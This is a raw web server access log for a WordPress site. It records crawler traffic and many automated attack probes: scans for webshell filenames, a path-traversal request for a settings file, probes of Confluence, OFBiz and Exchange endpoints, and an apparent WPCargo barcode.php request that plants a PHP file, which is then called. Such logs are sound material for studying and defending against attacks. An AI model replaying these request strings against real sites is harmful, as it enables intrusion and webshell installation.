157.20.32.210 - - [18/Oct/2025:09:26:06 -0400] "POST /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:26:09 -0400] "GET /.Wp-back.phP HTTP/1.1" 404 10903 "http://salhab360photos.com/.Wp-back.phP" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:09:26:12 -0400] "GET /products60898772?kg=0060156187 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:09:24:13 -0400] "GET /products235646840?kg=0232773181 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - caldav_public_user@localhost [18/Oct/2025:09:24:21 -0400] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
51.79.229.86 - - [18/Oct/2025:09:24:21 -0400] "GET /configx.php HTTP/1.1" 404 10899 "http://salhab360photos.com/configx.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:24:47 -0400] "GET /cuy.php HTTP/1.1" 404 10899 "http://salhab360photos.com/cuy.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:24:57 -0400] "GET /cut404.php HTTP/1.1" 404 10896 "http://salhab360photos.com/cut404.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:09:25:10 -0400] "GET /glay.php HTTP/1.1" 404 10896 "http://salhab360photos.com/glay.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:09:25:21 -0400] "POST /wp-cron.php?doing_wp_cron=1760793921.4683980941772460937500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.106 - - [18/Oct/2025:09:25:21 -0400] "GET /products1473822?kg=0001455930 HTTP/1.1" 200 29090 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:09:25:13 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:140.0) Gecko/20100101 Firefox/140.0"
51.79.229.86 - - [18/Oct/2025:09:25:15 -0400] "GET /gly.php HTTP/1.1" 404 10896 "http://salhab360photos.com/gly.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:25:24 -0400] "GET /nagiosxi/login.php HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; rv:140.0) Gecko/20100101 Firefox/140.0"
51.79.229.86 - - [18/Oct/2025:09:25:30 -0400] "GET /wsoijo.php HTTP/1.1" 404 10900 "http://salhab360photos.com/wsoijo.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:25:33 -0400] "GET /nagiosxi/login.php HTTP/1.1" 404 10900 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0"
51.79.229.86 - - [18/Oct/2025:09:25:40 -0400] "GET /mall.php HTTP/1.1" 404 10898 "http://salhab360photos.com/mall.php" "Go-http-client/2.0"
18.130.209.75 - - [18/Oct/2025:09:25:56 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:25:54 -0400] "GET /.ae.php HTTP/1.1" 404 10906 "http://salhab360photos.com/.ae.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:09:26:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760793974.5668969154357910156250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:09:26:07 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:10 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:09:26:24 -0400] "POST /wp-cron.php?doing_wp_cron=1760793983.7672960758209228515625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:09:26:19 -0400] "GET /.Wp-mailer.php HTTP/1.1" 404 10905 "http://salhab360photos.com/.Wp-mailer.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:23 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:20 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:28 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/140.0.4 (x64 de)"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /template/custom/content-editor HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /pages/doenterpagevariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_3 rv:2.0; so-DJ) AppleWebKit/533.15.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.15.6"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.8"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /template/custom/content-editor HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.8"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.5 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /users/user-dark-features HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.8"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.5 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.5 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /templates/editor-preload-container HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:32 -0400] "POST /users/user-dark-features HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 503 854 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /pages/doenterpagevariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_3 rv:2.0; so-DJ) AppleWebKit/533.15.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.15.6"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /templates/editor-preload-container HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:43 -0400] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:49 -0400] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /template/custom/content-editor HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /templates/editor-preload-container HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /pages/doenterpagevariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_3 rv:2.0; so-DJ) AppleWebKit/533.15.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.15.6"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /users/user-dark-features HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:26:56 -0400] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:27:00 -0400] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /template/custom/content-editor HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /templates/editor-preload-container HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:27:13 -0400] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
206.189.247.132 - - [18/Oct/2025:09:27:23 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
18.130.209.75 - - [18/Oct/2025:09:27:23 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
157.20.32.210 - - [18/Oct/2025:09:27:13 -0400] "GET /owa/auth/x.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10"
66.249.64.105 - - [18/Oct/2025:09:27:19 -0400] "GET /products707746?kg=0000699196 HTTP/1.1" 200 29273 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:09:27:16 -0400] "GET /products199368782?kg=0196937538 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:09:27:16 -0400] "GET /products60933626?kg=0060190616 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:09:27:37 -0400] "GET /products34965998?kg=0034539666 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:09:26:57 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
157.20.32.210 - - [18/Oct/2025:09:27:02 -0400] "GET /owa/auth/x.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10"
216.73.216.159 - - [18/Oct/2025:09:27:04 -0400] "GET /products235624786?kg=0232751396 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.8"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.5 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /pages/doenterpagevariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_3 rv:2.0; so-DJ) AppleWebKit/533.15.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.15.6"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /users/user-dark-features HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:27:06 -0400] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
45.133.172.88 - - [18/Oct/2025:09:27:23 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
146.190.11.185 - - [18/Oct/2025:09:27:25 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
157.20.32.210 - - [18/Oct/2025:09:27:26 -0400] "GET /owa/auth/x.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10"
216.73.216.159 - - [18/Oct/2025:09:27:28 -0400] "GET /products175150228?kg=0173014331 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:09:26:31 -0400] "GET /wp-mailer.php HTTP/1.1" 503 854 "http://salhab360photos.com/wp-mailer.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:27:58 -0400] "POST /api/snapshots HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:28:11 -0400] "POST /api/snapshots HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:09:28:22 -0400] "GET /products60887128?kg=0060144685 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:09:28:07 -0400] "GET /Wp-confiige.php HTTP/1.1" 503 854 "http://salhab360photos.com/Wp-confiige.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:27:47 -0400] "POST /api/snapshots HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:09:27:49 -0400] "GET /products173243856?kg=0171131209 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:09:28:01 -0400] "GET /products6768562?kg=0006686100 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:09:28:23 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:29:47 -0400] "GET /class.api.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:30:12 -0400] "GET /.well-known/pki-validation/class.api.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:09:30:06 -0400] "GET /products119114138?kg=0117661608 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:09:30:31 -0400] "GET /wp-content/plugins/wpcargo/includes/34EYaxrzs0czRcIBXABvijoANgP.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:30:36 -0400] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=34EYaxrzs0czRcIBXABvijoANgP.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9"
185.11.167.13 - - [18/Oct/2025:09:30:26 -0400] "GET /images/class.api.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:30:39 -0400] "POST /wp-content/plugins/wpcargo/includes/34EYaxrzs0czRcIBXABvijoANgP.php?1=var_dump HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:30:39 -0400] "GET /wp-content/uploads/class.api.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
98.70.29.56 - - [18/Oct/2025:09:30:05 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
185.11.167.13 - - [18/Oct/2025:09:31:05 -0400] "GET /wp-content/json.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
